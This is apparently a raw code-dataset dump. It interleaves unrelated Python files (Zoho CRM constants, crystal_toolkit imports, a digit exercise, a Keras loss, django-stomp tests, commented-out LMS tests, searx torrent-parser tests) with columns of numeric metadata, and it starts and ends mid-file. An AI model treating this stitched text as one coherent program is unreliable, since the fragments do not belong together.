    approved = Param('approved', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
    converted = Param('converted', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
    cvid = Param('cvid', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
    uid = Param('uid', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
    fields = Param('fields', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
    startdatetime = Param('startDateTime', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
    enddatetime = Param('endDateTime', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
    territory_id = Param('territory_id', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')
    include_child = Param('include_child', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDParam')


class GetRecordUsingExternalIDHeader(object):
    """Header key constants for the get-record-using-external-id request."""
    if_modified_since = Header('If-Modified-Since', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDHeader')
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.GetRecordUsingExternalIDHeader')


class UpdateRecordUsingExternalIDHeader(object):
    """Header key constants for the update-record-using-external-id request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.UpdateRecordUsingExternalIDHeader')


class DeleteRecordUsingExternalIDParam(object):
    """Param key constants for the delete-record-using-external-id request."""
    wf_trigger = Param('wf_trigger', 'com.zoho.crm.api.Record.DeleteRecordUsingExternalIDParam')


class DeleteRecordUsingExternalIDHeader(object):
    """Header key constants for the delete-record-using-external-id request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.DeleteRecordUsingExternalIDHeader')
| 39.788631
| 125
| 0.785959
| 6,569
| 49,696
| 5.673771
| 0.027097
| 0.045075
| 0.065923
| 0.053715
| 0.941188
| 0.91983
| 0.885809
| 0.873923
| 0.837702
| 0.828526
| 0
| 0.001104
| 0.125342
| 49,696
| 1,248
| 126
| 39.820513
| 0.856351
| 0.160496
| 0
| 0.767347
| 0
| 0
| 0.178036
| 0.075115
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034014
| false
| 0.001361
| 0.114286
| 0
| 0.307483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
09e88552ed321cc1dad79d9266caf1fb197cf131
| 494
|
py
|
Python
|
crystal_toolkit/renderables/__init__.py
|
mkhorton/mp-dash-components
|
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
|
[
"MIT"
] | null | null | null |
crystal_toolkit/renderables/__init__.py
|
mkhorton/mp-dash-components
|
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
|
[
"MIT"
] | 5
|
2018-10-18T19:52:12.000Z
|
2018-11-17T19:02:49.000Z
|
crystal_toolkit/renderables/__init__.py
|
mkhorton/mp-dash-components
|
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
|
[
"MIT"
] | null | null | null |
from crystal_toolkit.renderables.lattice import Lattice
from crystal_toolkit.renderables.moleculegraph import MoleculeGraph
from crystal_toolkit.renderables.molecule import Molecule
from crystal_toolkit.renderables.site import Site
from crystal_toolkit.renderables.structuregraph import StructureGraph
from crystal_toolkit.renderables.structure import Structure
from crystal_toolkit.renderables.volumetric import VolumetricData
from crystal_toolkit.renderables.phasediagram import PhaseDiagram
| 54.888889
| 69
| 0.902834
| 56
| 494
| 7.821429
| 0.25
| 0.200913
| 0.328767
| 0.52968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064777
| 494
| 8
| 70
| 61.75
| 0.948052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3a19f8b3d578738a3e947cc3ce1000c43ff036b9
| 714
|
py
|
Python
|
ex023 - lendo 0 a 9999.py
|
fblaz/Python-ex---curso-em-video
|
794d1f7b9fa0803b168aaf973007906b66a02e2d
|
[
"MIT"
] | null | null | null |
ex023 - lendo 0 a 9999.py
|
fblaz/Python-ex---curso-em-video
|
794d1f7b9fa0803b168aaf973007906b66a02e2d
|
[
"MIT"
] | null | null | null |
ex023 - lendo 0 a 9999.py
|
fblaz/Python-ex---curso-em-video
|
794d1f7b9fa0803b168aaf973007906b66a02e2d
|
[
"MIT"
] | null | null | null |
# Read a number from 0 to 9999 and print each positional digit
# (unit, ten, hundred, thousand).
num = int(input('digite um nr de 0 a 9999: '))
# Left-pad with zeros to exactly four characters. This replaces the original
# four-branch if/elif ladder that prepended '0' characters manually — the
# output for every value in 0..9999 is identical.
x = str(num).zfill(4)
print(f'UNIDADE: {x[3]}')
print(f'DEZENA: {x[2]}')
print(f'CENTENA: {x[1]}')
print(f'MILHAR: {x[0]}')
| 27.461538
| 47
| 0.47479
| 122
| 714
| 2.778689
| 0.221311
| 0.283186
| 0.129794
| 0.141593
| 0.811209
| 0.811209
| 0.811209
| 0.811209
| 0.811209
| 0.811209
| 0
| 0.067164
| 0.2493
| 714
| 25
| 48
| 28.56
| 0.565299
| 0
| 0
| 0.64
| 0
| 0
| 0.383164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.64
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
3a2a22deb0c65be0eb8befe738c8b9c82b488fe0
| 134
|
py
|
Python
|
loss_functions.py
|
mo-do/simple_net
|
3dc0d7c3f3bb88423ce2be55583a7156f8195b83
|
[
"MIT"
] | null | null | null |
loss_functions.py
|
mo-do/simple_net
|
3dc0d7c3f3bb88423ce2be55583a7156f8195b83
|
[
"MIT"
] | null | null | null |
loss_functions.py
|
mo-do/simple_net
|
3dc0d7c3f3bb88423ce2be55583a7156f8195b83
|
[
"MIT"
] | null | null | null |
from keras import backend as K
def my_categorical_crossentropy(y_true, y_pred):
    """Thin wrapper over the Keras backend's categorical cross-entropy,
    so the loss can be referenced under a project-local name."""
    loss = K.categorical_crossentropy(y_true, y_pred)
    return loss
| 33.5
| 53
| 0.820896
| 22
| 134
| 4.681818
| 0.636364
| 0.446602
| 0.466019
| 0.543689
| 0.640777
| 0.640777
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119403
| 134
| 4
| 53
| 33.5
| 0.872881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
28b517e858bfc2b67ff98723c57492a272add48e
| 2,320
|
py
|
Python
|
tests/unit/test_settings.py
|
juntossomosmais/django-stomp
|
65e7cb86f8f6e2336a2739df8f33f985c9b4c792
|
[
"MIT"
] | 32
|
2019-06-10T13:24:11.000Z
|
2021-12-17T21:00:41.000Z
|
tests/unit/test_settings.py
|
juntossomosmais/django-stomp
|
65e7cb86f8f6e2336a2739df8f33f985c9b4c792
|
[
"MIT"
] | 26
|
2019-12-17T12:51:00.000Z
|
2022-02-16T16:13:14.000Z
|
tests/unit/test_settings.py
|
juntossomosmais/django-stomp
|
65e7cb86f8f6e2336a2739df8f33f985c9b4c792
|
[
"MIT"
] | 1
|
2021-09-11T03:55:30.000Z
|
2021-09-11T03:55:30.000Z
|
import pytest
from django_stomp.exceptions import DjangoStompImproperlyConfigured
from django_stomp.settings import eval_as_int_if_provided_value_is_not_none_otherwise_none
from django_stomp.settings import eval_settings_otherwise_raise_exception
def test_should_raise_improperly_configured_when_settings_is_not_correct_configured(mocker):
    """Non-integer STOMP_PROCESS_MSG_WORKERS values must raise DjangoStompImproperlyConfigured."""
    mocked_settings = mocker.patch("django_stomp.settings.django_settings")
    expected_exception_message = "STOMP_PROCESS_MSG_WORKERS is not valid!"
    # The original repeated the same three-line body per invalid value; a loop
    # keeps the cases together without changing what is asserted.
    for invalid_value in ("abc", {}, []):
        mocked_settings.STOMP_PROCESS_MSG_WORKERS = invalid_value
        with pytest.raises(DjangoStompImproperlyConfigured, match=expected_exception_message):
            eval_settings_otherwise_raise_exception(
                "STOMP_PROCESS_MSG_WORKERS", eval_as_int_if_provided_value_is_not_none_otherwise_none
            )
def test_should_evaluate_settings_when_it_is_configured_as_expected(mocker):
    """Valid STOMP_PROCESS_MSG_WORKERS values evaluate to an int, and None is passed through."""
    mocked_settings = mocker.patch("django_stomp.settings.django_settings")
    # (configured value, expected evaluation) pairs from the original test.
    for configured_value, expected in ((None, None), (123, 123), ("3", 3)):
        mocked_settings.STOMP_PROCESS_MSG_WORKERS = configured_value
        evaluated = eval_settings_otherwise_raise_exception(
            "STOMP_PROCESS_MSG_WORKERS", eval_as_int_if_provided_value_is_not_none_otherwise_none
        )
        if expected is None:
            assert evaluated is None
        else:
            assert evaluated == expected
| 45.490196
| 97
| 0.825
| 290
| 2,320
| 5.962069
| 0.158621
| 0.090226
| 0.112782
| 0.165414
| 0.84037
| 0.822441
| 0.765761
| 0.742626
| 0.742626
| 0.742626
| 0
| 0.003964
| 0.130172
| 2,320
| 50
| 98
| 46.4
| 0.852825
| 0
| 0
| 0.435897
| 0
| 0
| 0.115086
| 0.107328
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.051282
| false
| 0
| 0.102564
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e92cb3f0f57630c85a62b97ccbf90c6e9c220a08
| 11,579
|
py
|
Python
|
lms/tests/feedback/test_feedback_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | null | null | null |
lms/tests/feedback/test_feedback_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | 6
|
2021-06-28T07:23:15.000Z
|
2021-07-22T12:59:33.000Z
|
lms/tests/feedback/test_feedback_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | null | null | null |
# import datetime
# import json
# from django.utils import timezone
# from django.urls import reverse
# from rest_framework.test import APITestCase, APIClient
# from rest_framework import status
# from rest_framework.generics import get_object_or_404
# from lms.models.feedback_models import EventInstanceFeedback
# from lms.models.enrollment_models import UserEnrollment
# from lms.models.event_models import Event, EventInstance
# from lms.tests.helper_functions import login
# class GetEventInstanceFeedbackTest(APITestCase):
# def setUp(self):
# self.user,self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes",
# }
# testEvent = Event.objects.create(**event)
# eventInst ={
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback="Testing Feedback")
# def test_get_event_instance_feedback(self):
# response = self.client.get(
# reverse("event-instance-feedback-view"),
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# class PostEventInstanceFeedbackTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes",
# }
# testEvent = Event.objects.create(**event)
# eventInst ={
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# self.validPayload = {
# "username" : self.user.username,
# "eventInstanceCode" : testEnrollment.eventInstance.eventInstanceCode,
# "eventInstanceFeedback" : "testing feedback",
# }
# def test_create_event_instance_feedback(self):
# response = self.client.post(
# reverse("event-instance-feedback-view"),
# data=json.dumps(self.validPayload),
# content_type = 'application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# def test_create_event_instance_feedback_without_enrollment(self):
# self.client = APIClient()
# response = self.client.post(
# reverse("event-instance-feedback-view"),
# data=json.dumps(self.validPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# class RetrieveEventInstanceFeedbackTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes"
# }
# testEvent = Event.objects.create(**event)
# eventInst = {
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# self.eventInstanceFeedback = EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback="Testing Feedback")
# def test_retrieve_event_instance_feedback(self):
# response = self.client.get(
# reverse('event-instance-feedback-view', kwargs={'pk':self.eventInstanceFeedback.id})
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# class UpdateEventInstanceFeedbackTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes"
# }
# testEvent = Event.objects.create(**event)
# eventInst = {
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# self.testEventInstanceFeedback = EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback="Testing Feedback")
# self.updatedPayload = {
# "username" : self.user.username,
# "eventInstanceCode" : testEnrollment.eventInstance.eventInstanceCode,
# "eventInstanceFeedback" : "updated testing feedback"
# }
# def test_update_event_instance_feedback(self):
# response = self.client.put(
# reverse('event-instance-feedback-view', kwargs={"pk":self.testEventInstanceFeedback.id}),
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# class DeleteEventInstanceFeedback(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes"
# }
# testEvent = Event.objects.create(**event)
# eventInst = {
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# self.eventInstanceFeedback = EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback="Testing Feedback")
# def test_delete_event_instance_feedback(self):
# response = self.client.delete(reverse('event-instance-feedback-view', kwargs={'pk':self.eventInstanceFeedback.id}))
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# class EventInstanceFeedbackFilterTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes",
# }
# testEvent = Event.objects.create(**event)
# eventInst ={
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# testEventInstanceFeedback = EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback='Testing Feedback')
# def test_event_instance_feedback_filter_username(self):
# response = self.client.get(
# f"{reverse('event-instance-feedback-view')}?userEnrollment__user__username=yankai14&eventInstance__eventInstanceCode=&date_created="
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data["count"], 1)
# def test_event_instance_feedback_filter_event_instance_code(self):
# response = self.client.get(
# f"{reverse('event-instance-feedback-view')}?userEnrollment__user__username=&eventInstance__eventInstanceCode=Test102&date_created="
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data["count"], 1)
| 35.627692
| 185
| 0.575697
| 922
| 11,579
| 7.132321
| 0.129067
| 0.045468
| 0.051095
| 0.051095
| 0.861618
| 0.859337
| 0.842914
| 0.826034
| 0.819343
| 0.787105
| 0
| 0.013729
| 0.295449
| 11,579
| 324
| 186
| 35.737654
| 0.792351
| 0.941446
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3a75c66974ebc8855998e95aa7e27ee575a6cab1
| 22,271
|
py
|
Python
|
Toolkits/Discovery/meta/searx/tests/unit/engines/test_kickass.py
|
roscopecoltran/SniperKit-Core
|
4600dffe1cddff438b948b6c22f586d052971e04
|
[
"MIT"
] | 4
|
2018-09-07T15:35:24.000Z
|
2019-03-27T09:48:12.000Z
|
Toolkits/Discovery/meta/searx/tests/unit/engines/test_kickass.py
|
roscopecoltran/SniperKit-Core
|
4600dffe1cddff438b948b6c22f586d052971e04
|
[
"MIT"
] | 371
|
2020-03-04T21:51:56.000Z
|
2022-03-31T20:59:11.000Z
|
Toolkits/Discovery/meta/searx/tests/unit/engines/test_kickass.py
|
roscopecoltran/SniperKit-Core
|
4600dffe1cddff438b948b6c22f586d052971e04
|
[
"MIT"
] | 3
|
2019-06-18T19:57:17.000Z
|
2020-11-06T03:55:08.000Z
|
# -*- coding: utf-8 -*-
from collections import defaultdict
import mock
from searx.engines import kickass
from searx.testing import SearxTestCase
class TestKickassEngine(SearxTestCase):
    """Unit tests for the searx ``kickass`` engine: request construction and
    parsing of the result-page HTML."""

    def test_request(self):
        """The generated request URL must contain the query and engine host."""
        query = 'test_query'
        dicto = defaultdict(dict)
        dicto['pageno'] = 1
        params = kickass.request(query, dicto)
        self.assertIn('url', params)
        self.assertIn(query, params['url'])
        self.assertIn('kickass.cd', params['url'])
        # SSL verification is disabled for this engine.
        self.assertFalse(params['verify'])

    def test_response(self):
        """Parse several crafted result pages and check the extracted fields."""
        # Non-response inputs must raise instead of being silently ignored.
        self.assertRaises(AttributeError, kickass.response, None)
        self.assertRaises(AttributeError, kickass.response, [])
        self.assertRaises(AttributeError, kickass.response, '')
        self.assertRaises(AttributeError, kickass.response, '[]')

        # A page without a results table yields an empty result list.
        response = mock.Mock(text='<html></html>')
        self.assertEqual(kickass.response(response), [])

        # One well-formed result row: every field should be extracted.
        html = """
        <table cellpadding="0" cellspacing="0" class="data" style="width: 100%">
        <tr class="firstr">
        <th class="width100perc nopad">torrent name</th>
        <th class="center">
        <a href="/search/test/?field=size&sorder=desc" rel="nofollow">size</a>
        </th>
        <th class="center"><span class="files">
        <a href="/search/test/?field=files_count&sorder=desc" rel="nofollow">files</a></span>
        </th>
        <th class="center"><span>
        <a href="/search/test/?field=time_add&sorder=desc" rel="nofollow">age</a></span>
        </th>
        <th class="center"><span class="seed">
        <a href="/search/test/?field=seeders&sorder=desc" rel="nofollow">seed</a></span>
        </th>
        <th class="lasttd nobr center">
        <a href="/search/test/?field=leechers&sorder=desc" rel="nofollow">leech</a>
        </th>
        </tr>
        <tr class="even" id="torrent_test6478745">
        <td>
        <div class="iaconbox center floatright">
        <a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
        <em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
        <i class="ka ka-comment"></i>
        </a>
        <a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
        <i class="ka ka16 ka-verify ka-green"></i>
        </a>
        <a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
        <i class="ka ka16 ka-arrow-down partner1Button"></i>
        </a>
        <a title="Torrent magnet link"
        href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
        <i class="ka ka16 ka-magnet"></i>
        </a>
        <a title="Download torrent file"
        href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
        <i class="ka ka16 ka-arrow-down"></i>
        </a>
        </div>
        <div class="torrentname">
        <a href="/test-t6478745.html" class="torType txtType"></a>
        <a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
        <div class="markeredBlock torType txtType">
        <a href="/url.html" class="cellMainLink">
        <strong class="red">This should be the title</strong>
        </a>
        <span class="font11px lightgrey block">
        Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
        <a class="plain" href="/user/riri/">riri</a> in
        <span id="cat_6478745">
        <strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
        </span>
        </span>
        </div>
        </td>
        <td class="nobr center">449 bytes</td>
        <td class="center">4</td>
        <td class="center">2 years</td>
        <td class="green center">10</td>
        <td class="red lasttd center">1</td>
        </tr>
        </table>
        """
        response = mock.Mock(text=html)
        results = kickass.response(response)
        self.assertEqual(type(results), list)
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0]['title'], 'This should be the title')
        self.assertEqual(results[0]['url'], 'https://kickass.cd/url.html')
        self.assertEqual(results[0]['content'], 'Posted by riri in Other > Unsorted')
        self.assertEqual(results[0]['seed'], 10)
        self.assertEqual(results[0]['leech'], 1)
        self.assertEqual(results[0]['filesize'], 449)
        self.assertEqual(results[0]['files'], 4)
        self.assertEqual(results[0]['magnetlink'], 'magnet:?xt=urn:btih:MAGNETURL&dn=test')
        self.assertEqual(results[0]['torrentfile'], 'http://torcache.net/torrent/53917.torrent?title=test')

        # A table containing only the header row yields no results.
        html = """
        <table cellpadding="0" cellspacing="0" class="data" style="width: 100%">
        <tr class="firstr">
        <th class="width100perc nopad">torrent name</th>
        <th class="center">
        <a href="/search/test/?field=size&sorder=desc" rel="nofollow">size</a>
        </th>
        <th class="center"><span class="files">
        <a href="/search/test/?field=files_count&sorder=desc" rel="nofollow">files</a></span>
        </th>
        <th class="center"><span>
        <a href="/search/test/?field=time_add&sorder=desc" rel="nofollow">age</a></span>
        </th>
        <th class="center"><span class="seed">
        <a href="/search/test/?field=seeders&sorder=desc" rel="nofollow">seed</a></span>
        </th>
        <th class="lasttd nobr center">
        <a href="/search/test/?field=leechers&sorder=desc" rel="nofollow">leech</a>
        </th>
        </tr>
        </table>
        """
        response = mock.Mock(text=html)
        results = kickass.response(response)
        self.assertEqual(type(results), list)
        self.assertEqual(len(results), 0)

        # Five rows covering the KiB/MiB/GiB/TiB size units, plus a final row
        # with non-numeric cells (seed/leech fall back to 0, files and
        # filesize to None).
        html = """
        <table cellpadding="0" cellspacing="0" class="data" style="width: 100%">
        <tr class="firstr">
        <th class="width100perc nopad">torrent name</th>
        <th class="center">
        <a href="/search/test/?field=size&sorder=desc" rel="nofollow">size</a>
        </th>
        <th class="center"><span class="files">
        <a href="/search/test/?field=files_count&sorder=desc" rel="nofollow">files</a></span>
        </th>
        <th class="center"><span>
        <a href="/search/test/?field=time_add&sorder=desc" rel="nofollow">age</a></span>
        </th>
        <th class="center"><span class="seed">
        <a href="/search/test/?field=seeders&sorder=desc" rel="nofollow">seed</a></span>
        </th>
        <th class="lasttd nobr center">
        <a href="/search/test/?field=leechers&sorder=desc" rel="nofollow">leech</a>
        </th>
        </tr>
        <tr class="even" id="torrent_test6478745">
        <td>
        <div class="iaconbox center floatright">
        <a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
        <em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
        <i class="ka ka-comment"></i>
        </a>
        <a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
        <i class="ka ka16 ka-verify ka-green"></i>
        </a>
        <a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
        <i class="ka ka16 ka-arrow-down partner1Button"></i>
        </a>
        <a title="Torrent magnet link"
        href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
        <i class="ka ka16 ka-magnet"></i>
        </a>
        <a title="Download torrent file"
        href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
        <i class="ka ka16 ka-arrow-down"></i>
        </a>
        </div>
        <div class="torrentname">
        <a href="/test-t6478745.html" class="torType txtType"></a>
        <a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
        <div class="markeredBlock torType txtType">
        <a href="/url.html" class="cellMainLink">
        <strong class="red">This should be the title</strong>
        </a>
        <span class="font11px lightgrey block">
        Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
        <a class="plain" href="/user/riri/">riri</a> in
        <span id="cat_6478745">
        <strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
        </span>
        </span>
        </div>
        </td>
        <td class="nobr center">1 KiB</td>
        <td class="center">4</td>
        <td class="center">2 years</td>
        <td class="green center">10</td>
        <td class="red lasttd center">1</td>
        </tr>
        <tr class="even" id="torrent_test6478745">
        <td>
        <div class="iaconbox center floatright">
        <a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
        <em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
        <i class="ka ka-comment"></i>
        </a>
        <a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
        <i class="ka ka16 ka-verify ka-green"></i>
        </a>
        <a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
        <i class="ka ka16 ka-arrow-down partner1Button"></i>
        </a>
        <a title="Torrent magnet link"
        href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
        <i class="ka ka16 ka-magnet"></i>
        </a>
        <a title="Download torrent file"
        href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
        <i class="ka ka16 ka-arrow-down"></i>
        </a>
        </div>
        <div class="torrentname">
        <a href="/test-t6478745.html" class="torType txtType"></a>
        <a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
        <div class="markeredBlock torType txtType">
        <a href="/url.html" class="cellMainLink">
        <strong class="red">This should be the title</strong>
        </a>
        <span class="font11px lightgrey block">
        Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
        <a class="plain" href="/user/riri/">riri</a> in
